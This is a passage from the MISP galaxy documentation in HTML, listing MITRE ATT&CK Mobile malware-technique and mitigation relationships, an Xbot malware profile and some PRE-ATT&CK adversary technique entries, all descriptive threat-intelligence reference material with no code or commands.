<h3 id="_user_guidance_mob_m1011_mitigates_malicious_third_party_keyboard_app_mob_t1020"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_malicious_third_party_keyboard_app_mob_t1020"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_malicious_third_party_keyboard_app_mob_t1020">User Guidance (MOB-M1011) mitigates Malicious Third Party Keyboard App (MOB-T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_exploit_os_vulnerability_mob_t1007">Security Updates (MOB-M1001) mitigates Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_pjapps_mob_s0007_uses_location_tracking_mob_t1033"><a class="anchor" href="#_pjapps_mob_s0007_uses_location_tracking_mob_t1033"></a><a class="link" href="#_pjapps_mob_s0007_uses_location_tracking_mob_t1033">PJApps (MOB-S0007) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_location_tracking_mob_t1033"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_location_tracking_mob_t1033"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_location_tracking_mob_t1033">Application Vetting (MOB-M1005) mitigates Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_pegasus_mob_s0005_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_pegasus_mob_s0005_uses_capture_sms_messages_mob_t1015">Pegasus (MOB-S0005) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_capture_clipboard_data_mob_t1017"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_capture_clipboard_data_mob_t1017"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_capture_clipboard_data_mob_t1017">RCSAndroid (MOB-S0011) uses Capture Clipboard Data (MOB-T1017)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_commonly_used_port_mob_t1039"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_commonly_used_port_mob_t1039"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_commonly_used_port_mob_t1039">Android/Chuli.A (MOB-S0020) uses Commonly Used Port (MOB-T1039)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052">Encrypt Network Traffic (MOB-M1009) mitigates Exploit SS7 to Redirect Phone Calls/SMS (MOB-T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_xbot_mob_s0014_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_xbot_mob_s0014_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_xbot_mob_s0014_uses_capture_sms_messages_mob_t1015">Xbot (MOB-S0014) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_rogue_wi_fi_access_points_mob_t1068"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_rogue_wi_fi_access_points_mob_t1068"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_rogue_wi_fi_access_points_mob_t1068">Encrypt Network Traffic (MOB-M1009) mitigates Rogue Wi-Fi Access Points (MOB-T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_gooligan_mob_s0006_uses_generate_fraudulent_advertising_revenue_mob_t1075"><a class="anchor" href="#_gooligan_mob_s0006_uses_generate_fraudulent_advertising_revenue_mob_t1075"></a><a class="link" href="#_gooligan_mob_s0006_uses_generate_fraudulent_advertising_revenue_mob_t1075">Gooligan (MOB-S0006) uses Generate Fraudulent Advertising Revenue (MOB-T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_modify_system_partition_mob_t1003"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_modify_system_partition_mob_t1003"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_modify_system_partition_mob_t1003">Pegasus for Android (MOB-S0032) uses Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_modify_system_partition_mob_t1003"><a class="anchor" href="#_pegasus_mob_s0005_uses_modify_system_partition_mob_t1003"></a><a class="link" href="#_pegasus_mob_s0005_uses_modify_system_partition_mob_t1003">Pegasus (MOB-S0005) uses Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_disguise_root_jailbreak_indicators_mob_t1011"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_disguise_root_jailbreak_indicators_mob_t1011"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_disguise_root_jailbreak_indicators_mob_t1011">Security Updates (MOB-M1001) mitigates Disguise Root/Jailbreak Indicators (MOB-T1011)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_abuse_accessibility_features_mob_t1056"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_abuse_accessibility_features_mob_t1056"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_abuse_accessibility_features_mob_t1056">Application Vetting (MOB-M1005) mitigates Abuse Accessibility Features (MOB-T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_access_sensitive_data_in_device_logs_mob_t1016"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_access_sensitive_data_in_device_logs_mob_t1016"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_access_sensitive_data_in_device_logs_mob_t1016">Use Recent OS Version (MOB-M1006) mitigates Access Sensitive Data in Device Logs (MOB-T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076">Security Updates (MOB-M1001) mitigates Malicious or Vulnerable Built-in Device Functionality (MOB-T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_access_call_log_mob_t1036"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_access_call_log_mob_t1036"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_access_call_log_mob_t1036">Android/Chuli.A (MOB-S0020) uses Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_braintest_mob_s0009_uses_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_braintest_mob_s0009_uses_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_braintest_mob_s0009_uses_exploit_os_vulnerability_mob_t1007">BrainTest (MOB-S0009) uses Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_access_call_log_mob_t1036"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_access_call_log_mob_t1036"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_access_call_log_mob_t1036">Security Updates (MOB-M1001) mitigates Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_access_call_log_mob_t1036"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_access_call_log_mob_t1036"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_access_call_log_mob_t1036">Pegasus for Android (MOB-S0032) uses Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_access_sensitive_data_in_device_logs_mob_t1016"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_access_sensitive_data_in_device_logs_mob_t1016"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_access_sensitive_data_in_device_logs_mob_t1016">Security Updates (MOB-M1001) mitigates Access Sensitive Data in Device Logs (MOB-T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_modify_cached_executable_code_mob_t1006"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_modify_cached_executable_code_mob_t1006"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_modify_cached_executable_code_mob_t1006">Security Updates (MOB-M1001) mitigates Modify cached executable code (MOB-T1006)</a></h3>
</div>
<div class="sect2">
<h3 id="_xbot_mob_s0014_uses_encrypt_files_for_ransom_mob_t1074"><a class="anchor" href="#_xbot_mob_s0014_uses_encrypt_files_for_ransom_mob_t1074"></a><a class="link" href="#_xbot_mob_s0014_uses_encrypt_files_for_ransom_mob_t1074">Xbot (MOB-S0014) uses Encrypt Files for Ransom (MOB-T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_user_interface_spoofing_mob_t1014"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_user_interface_spoofing_mob_t1014"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_user_interface_spoofing_mob_t1014">Application Vetting (MOB-M1005) mitigates User Interface Spoofing (MOB-T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_stolen_developer_credentials_or_signing_keys_mob_t1044"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_stolen_developer_credentials_or_signing_keys_mob_t1044"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_stolen_developer_credentials_or_signing_keys_mob_t1044">User Guidance (MOB-M1011) mitigates Stolen Developer Credentials or Signing Keys (MOB-T1044)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_remotely_install_application_mob_t1046"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_remotely_install_application_mob_t1046"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_remotely_install_application_mob_t1046">User Guidance (MOB-M1011) mitigates Remotely Install Application (MOB-T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_sms_androidos_fakeinst_a_mob_s0022_uses_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_trojan_sms_androidos_fakeinst_a_mob_s0022_uses_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_trojan_sms_androidos_fakeinst_a_mob_s0022_uses_standard_application_layer_protocol_mob_t1040">Trojan-SMS.AndroidOS.FakeInst.a (MOB-S0022) uses Standard Application Layer Protocol (MOB-T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_shedun_mob_s0010_uses_modify_system_partition_mob_t1003"><a class="anchor" href="#_shedun_mob_s0010_uses_modify_system_partition_mob_t1003"></a><a class="link" href="#_shedun_mob_s0010_uses_modify_system_partition_mob_t1003">Shedun (MOB-S0010) uses Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012">Application Vetting (MOB-M1005) mitigates Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_x_agent_mob_s0030"><a class="anchor" href="#_apt28_g0007_uses_x_agent_mob_s0030"></a><a class="link" href="#_apt28_g0007_uses_x_agent_mob_s0030">APT28 (G0007) uses X-Agent (MOB-S0030)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_insecure_third_party_libraries_mob_t1028"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_insecure_third_party_libraries_mob_t1028"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_insecure_third_party_libraries_mob_t1028">Application Vetting (MOB-M1005) mitigates Insecure Third-Party Libraries (MOB-T1028)</a></h3>
</div>
<div class="sect2">
<h3 id="_charger_mob_s0039_uses_detect_app_analysis_environment_mob_t1043"><a class="anchor" href="#_charger_mob_s0039_uses_detect_app_analysis_environment_mob_t1043"></a><a class="link" href="#_charger_mob_s0039_uses_detect_app_analysis_environment_mob_t1043">Charger (MOB-S0039) uses Detect App Analysis Environment (MOB-T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_androidoverlaymalware_mob_s0012_uses_user_interface_spoofing_mob_t1014"><a class="anchor" href="#_androidoverlaymalware_mob_s0012_uses_user_interface_spoofing_mob_t1014"></a><a class="link" href="#_androidoverlaymalware_mob_s0012_uses_user_interface_spoofing_mob_t1014">AndroidOverlayMalware (MOB-S0012) uses User Interface Spoofing (MOB-T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_local_network_configuration_discovery_mob_t1025">Application Vetting (MOB-M1005) mitigates Local Network Configuration Discovery (MOB-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_os_vulnerability_mob_t1007">Use Recent OS Version (MOB-M1006) mitigates Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_spynote_rat_mob_s0021_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_spynote_rat_mob_s0021_uses_capture_sms_messages_mob_t1015">SpyNote RAT (MOB-S0021) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_access_contact_list_mob_t1035">Pegasus for Android (MOB-S0032) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_androrat_mob_s0008_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_androrat_mob_s0008_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_androrat_mob_s0008_uses_access_contact_list_mob_t1035">AndroRAT (MOB-S0008) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_malicious_software_development_tools_mob_t1065"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_malicious_software_development_tools_mob_t1065"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_malicious_software_development_tools_mob_t1065">Enterprise Policy (MOB-M1012) mitigates Malicious Software Development Tools (MOB-T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_mazarbot_mob_s0019_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_mazarbot_mob_s0019_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_mazarbot_mob_s0019_uses_capture_sms_messages_mob_t1015">MazarBOT (MOB-S0019) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_exploit_via_charging_station_or_pc_mob_t1061">User Guidance (MOB-M1011) mitigates Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_pjapps_mob_s0007_uses_premium_sms_toll_fraud_mob_t1051"><a class="anchor" href="#_pjapps_mob_s0007_uses_premium_sms_toll_fraud_mob_t1051"></a><a class="link" href="#_pjapps_mob_s0007_uses_premium_sms_toll_fraud_mob_t1051">PJApps (MOB-S0007) uses Premium SMS Toll Fraud (MOB-T1051)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_lock_user_out_of_device_mob_t1049">Application Vetting (MOB-M1005) mitigates Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_xbot_mob_s0014_uses_user_interface_spoofing_mob_t1014"><a class="anchor" href="#_xbot_mob_s0014_uses_user_interface_spoofing_mob_t1014"></a><a class="link" href="#_xbot_mob_s0014_uses_user_interface_spoofing_mob_t1014">Xbot (MOB-S0014) uses User Interface Spoofing (MOB-T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_dualtoy_mob_s0031_uses_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_dualtoy_mob_s0031_uses_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_dualtoy_mob_s0031_uses_exploit_via_charging_station_or_pc_mob_t1061">DualToy (MOB-S0031) uses Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_modify_system_partition_mob_t1003"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_modify_system_partition_mob_t1003"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_modify_system_partition_mob_t1003">Security Updates (MOB-M1001) mitigates Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_alternate_network_mediums_mob_t1041"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_alternate_network_mediums_mob_t1041"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_alternate_network_mediums_mob_t1041">Pegasus for Android (MOB-S0032) uses Alternate Network Mediums (MOB-T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_spynote_rat_mob_s0021_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_spynote_rat_mob_s0021_uses_microphone_or_camera_recordings_mob_t1032">SpyNote RAT (MOB-S0021) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_download_new_code_at_runtime_mob_t1010"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_download_new_code_at_runtime_mob_t1010"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_download_new_code_at_runtime_mob_t1010">Application Vetting (MOB-M1005) mitigates Download New Code at Runtime (MOB-T1010)</a></h3>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_mobile_attack_tool"><a class="anchor" href="#_mobile_attack_tool"></a><a class="link" href="#_mobile_attack_tool">Mobile Attack - Tool</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK software.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Mobile Attack - Tool is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile</a> attack - tool.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_xbot_mob_s0014"><a class="anchor" href="#_xbot_mob_s0014"></a><a class="link" href="#_xbot_mob_s0014">Xbot - MOB-S0014</a></h3>
<div class="paragraph">
<p>Xbot is a family of Android malware analyzed by Palo Alto Networks (Citation: PaloAlto-Xbot) that "tries to steal victims' banking credentials and credit card information", "can also remotely lock infected Android devices, encrypt the user&#8217;s files in external storage (e.g., SD card), and then ask for a U.S. $100 PayPal cash card as ransom" and "will steal all SMS message and contact information, intercept certain SMS messages, and parse SMS messages for mTANs (Mobile Transaction Authentication Number) from banks."</p>
</div>
<div class="paragraph">
<p>Aliases: Xbot</p>
</div>
<div class="paragraph">
<p>Xbot - MOB-S0014 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Xbot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1454. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0014">https://attack.mitre.org/mobile/index.php/Software/MOB-S0014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/">http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_pre_attack_attack_pattern"><a class="anchor" href="#_pre_attack_attack_pattern"></a><a class="link" href="#_pre_attack_attack_pattern">Pre Attack - Attack Pattern</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK tactic.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Pre Attack - Attack Pattern is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/pre" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/pre</a> attack - attack pattern.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_test_ability_to_evade_automated_mobile_application_security_analysis_performed_by_app_stores_pre_t1170"><a class="anchor" href="#_test_ability_to_evade_automated_mobile_application_security_analysis_performed_by_app_stores_pre_t1170"></a><a class="link" href="#_test_ability_to_evade_automated_mobile_application_security_analysis_performed_by_app_stores_pre_t1170">Test ability to evade automated mobile application security analysis performed by app stores - PRE-T1170</a></h3>
<div class="paragraph">
<p>Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: The app store operators (e.g., Apple and Google) may detect the attempts, but it would not be observable to those being attacked.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: An adversary can submit code remotely using throwaway accounts, although a registration fee may need to be paid for each new account (e.g., $99 for Apple and $25 for Google Play Store).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1455. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1170">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1170</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscate_infrastructure_pre_t1108"><a class="anchor" href="#_obfuscate_infrastructure_pre_t1108"></a><a class="link" href="#_obfuscate_infrastructure_pre_t1108">Obfuscate infrastructure - PRE-T1108</a></h3>
<div class="paragraph">
<p>Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will generally not have visibility into their infrastructure.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Building and testing infrastructure and obfuscating it to protect it against intrusions are a standard part of the adversary process in preparing to conduct an operation against a target.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1456. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1108">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1108</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_backup_infrastructure_pre_t1116"><a class="anchor" href="#_create_backup_infrastructure_pre_t1116"></a><a class="link" href="#_create_backup_infrastructure_pre_t1116">Create backup infrastructure - PRE-T1116</a></h3>
<div class="paragraph">
<p>Backup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. (Citation: LUCKYCAT2012)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be obvious to those being attacked.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [<a href="https://aws.amazon.com" class="bare">https://aws.amazon.com</a> AWS], commercial storage solutions).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1457. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1116">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1116</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_targeting_options_pre_t1073"><a class="anchor" href="#_assess_targeting_options_pre_t1073"></a><a class="link" href="#_assess_targeting_options_pre_t1073">Assess targeting options - PRE-T1073</a></h3>
<div class="paragraph">
<p>An adversary may assess a target&#8217;s operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more of less cautious in different environments. (Citation: Scasny2015) (Citation: EverstineAirStrikes)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender does not have access to information stored outside of defenders scope or visibility (e.g., log data for Facebook is not easily accessible). Defender has very infrequent visibility into an adversary&#8217;s more detailed TTPs for developing people targets.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Information is out in the open for items that are available - part of this is ease of use for consumers to support the expected networking use case. OSINT can provide many avenues to gather intel which contain weaknesses. Developing and refining the methodology to exploit weak human targets has been done for years (e.g., spies).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1458. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1073">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1073</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_receive_operator_kits_kiqs_tasking_pre_t1012"><a class="anchor" href="#_receive_operator_kits_kiqs_tasking_pre_t1012"></a><a class="link" href="#_receive_operator_kits_kiqs_tasking_pre_t1012">Receive operator KITs/KIQs tasking - PRE-T1012</a></h3>
<div class="paragraph">
<p>Analysts may receive intelligence requirements from leadership and begin research process to satisfy a requirement. Part of this process may include delineating between needs and wants and thinking through all the possible aspects associating with satisfying a requirement. (Citation: FBIIntelligencePrimer)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
